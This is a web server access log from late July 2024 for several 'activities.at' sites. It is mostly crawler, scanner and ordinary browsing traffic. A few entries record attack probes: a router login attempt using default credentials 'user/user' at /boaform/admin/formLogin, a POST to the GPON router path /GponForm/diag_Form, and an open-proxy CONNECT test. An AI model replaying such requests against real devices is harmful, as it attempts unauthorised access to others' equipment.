202.168.86.215 - - [29/Jul/2024:07:36:50 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 378 "-" "-"
156.59.198.135 - - [29/Jul/2024:07:38:35 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911061203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:38:55 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10843283.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:45:44 +0200] "GET /hausegger.activities.at/stats/lang/tooltips_f/awstats-tt-it.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:56:07 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-fr.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:56:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10789939.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:05:46 +0200] "GET /default/cgi-bin/lang/awstats-ua.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:08:10:06 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-fi.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:08:13:43 +0200] "GET /default/cgi-bin/lang/awstats-en.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
20.118.69.90 - - [29/Jul/2024:08:18:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Jul/2024:08:32:04 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107231803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:33:22 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11306527.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.202 - - [29/Jul/2024:08:34:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Jul/2024:08:37:14 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11753949.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.43 - - [29/Jul/2024:08:40:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.189 - - [29/Jul/2024:08:42:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Jul/2024:08:43:45 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10753194.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:44:07 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-es.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:49:49 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009210903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:51:16 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668214.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:53:58 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908311003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:08:57:44 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-gl.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:08:58:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12493049.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:08:59:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10404919.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:09:05:38 +0200] "GET /default/cgi-bin/lang/awstats-bg.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:05:58 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006061003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:09:06:33 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_m/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [29/Jul/2024:09:21:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
112.46.216.108 - - [29/Jul/2024:09:29:10 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
188.16.170.174 - - [29/Jul/2024:09:29:19 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
156.59.198.135 - - [29/Jul/2024:09:30:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10460075.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:09:32:04 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103151403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:09:32:43 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010131603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.172.172.183 - - [29/Jul/2024:09:34:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:57.0.1) Gecko/20100101 Firefox/57.0.1"
156.59.198.135 - - [29/Jul/2024:09:34:32 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-dk.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:34:56 +0200] "GET /default/cgi-bin/lang/awstats-nl.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.219.148 - - [29/Jul/2024:09:35:24 +0200] "GET /viewtopic.php?f=8&t=420&sid=54df32ee0ee0f7bf8a54e23511949d55 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
156.59.198.136 - - [29/Jul/2024:09:36:52 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005191503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:44:51 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005131003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:45:35 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910281103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.145.99 - - [29/Jul/2024:09:50:59 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.99 - - [29/Jul/2024:09:51:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [29/Jul/2024:09:51:03 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [29/Jul/2024:09:51:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [29/Jul/2024:09:51:03 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [29/Jul/2024:09:51:10 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-ua.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.165.17.13 - - [29/Jul/2024:09:52:53 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.136 - - [29/Jul/2024:09:54:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213736.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:57:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11824056.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:09:59:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11503844.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:09:59:44 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009020903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:10:00:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10371251.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:10:01:00 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-br.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:10:01:21 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12322885.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:10:03:53 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-cn.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:10:06:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11869513.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [29/Jul/2024:10:38:59 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Safari/605.1.15 Epiphany/605.1.15"
156.59.198.135 - - [29/Jul/2024:10:41:17 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-sr.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:10:49:07 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002201503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:10:51:59 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11250494.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:10:52:53 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11483373.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
165.140.167.12 - - [29/Jul/2024:10:55:18 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
185.191.126.213 - - [29/Jul/2024:10:55:52 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
79.35.111.7 - - [29/Jul/2024:10:58:39 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
120.85.184.205 - - [29/Jul/2024:10:58:56 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 286 "-" "Hello, World"
156.59.198.136 - - [29/Jul/2024:11:00:39 +0200] "GET /default/cgi-bin/lang/awstats-lt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:11:02:06 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-en.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:11:04:49 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11660663.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /gui/javascript/form_form.js?1722243963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /gui/javascript/form_form.js?1722243963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:03 +0200] "GET /gui/javascript/form_form.js?1722243963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /gui/javascript/form_form.js?1722243963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 933 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2418 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /gui/javascript/form_form.js?1722243964 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:04 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:06:06 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:09 +0200] "GET /gui/javascript/form_form.js?1722244029 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:09 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 2011 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:09 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /framework/webfx/javascript/navigation/crossbrowser.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /framework/webfx/javascript/navigation/outlook.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /gui/javascript/form_form.js?1722244030 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /gui/javascript/form_form.js?1722244030 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /gui/images/icons/pers_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /framework/icons/navigation/arrowup.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /framework/icons/navigation/arrowdown.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /gui/images/icons/default_item.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [29/Jul/2024:11:07:10 +0200] "GET /gui/images/icons/i_resourcenverwaltung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
